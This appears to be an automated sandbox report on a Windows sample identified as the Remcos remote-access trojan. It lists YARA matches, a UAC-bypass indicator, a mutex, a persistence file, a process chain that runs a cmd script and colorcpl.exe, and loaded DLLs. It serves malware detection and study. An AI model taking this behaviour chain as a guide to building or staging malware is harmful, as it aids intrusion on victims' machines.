                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Emxwenem.PIF.0.dr | Binary string: \Device\Floppy0U
                Source: Emxwenem.PIF.0.dr | Binary string: \Device\Floppy0
                Source: classification engine | Classification label: mal100.rans.troj.spyw.evad.winEXE@21/8@2/3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A5C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 5_2_030A5C90
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029A5C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, | 10_2_029A5C90
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B87F5A GetDiskFreeSpaceA, | 0_2_02B87F5A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle, | 5_2_0309E2E7
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B96D50 CoCreateInstance, | 0_2_02B96D50
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A9493 FindResourceA,LoadResource,LockResource,SizeofResource, | 5_2_030A9493
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A8A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, | 5_2_030A8A00
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | File created: C:\Users\Public\EmxwenemF.cmd
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
                Source: C:\Windows\SysWOW64\colorcpl.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3W4HX7
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: SEPTobn3BR.exe | Virustotal: Detection: 66%
                Source: SEPTobn3BR.exe | ReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | File read: C:\Users\user\Desktop\SEPTobn3BR.exe
                Source: unknown | Process created: C:\Users\user\Desktop\SEPTobn3BR.exe "C:\Users\user\Desktop\SEPTobn3BR.exe"
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: unknown | Process created: C:\Users\Public\Libraries\Emxwenem.PIF "C:\Users\Public\Libraries\Emxwenem.PIF"
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: unknown | Process created: C:\Users\Public\Libraries\Emxwenem.PIF "C:\Users\Public\Libraries\Emxwenem.PIF"
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: olepro32.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: url.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ieframe.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: netapi32.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: wkscli.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ieproxy.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: mssip32.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: smartscreenps.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: winhttpcom.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ??????????.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ??.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ??l.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ????.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: ???e???????????.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: tquery.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: cryptdll.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: spp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: vssapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: vsstrace.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: endpointdlp.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: advapi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: sppwmi.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: sppcext.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: winscard.dll
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Section loaded: devobj.dll
                Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mscms.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: coloradapterclient.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winmm.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: fwpuclnt.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: apphelp.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: version.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: uxtheme.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: olepro32.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: url.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: ieframe.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: iertutil.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: netapi32.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: userenv.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: winhttp.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: wkscli.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: netutils.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: amsi.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: winmm.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: wininet.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: sspicli.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: windows.storage.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: wldp.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: profapi.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: kernel.appcore.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: ieproxy.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: mswsock.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: msasn1.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: iphlpapi.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: winnsi.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Section loaded: mssip32.dll
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: tquery.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
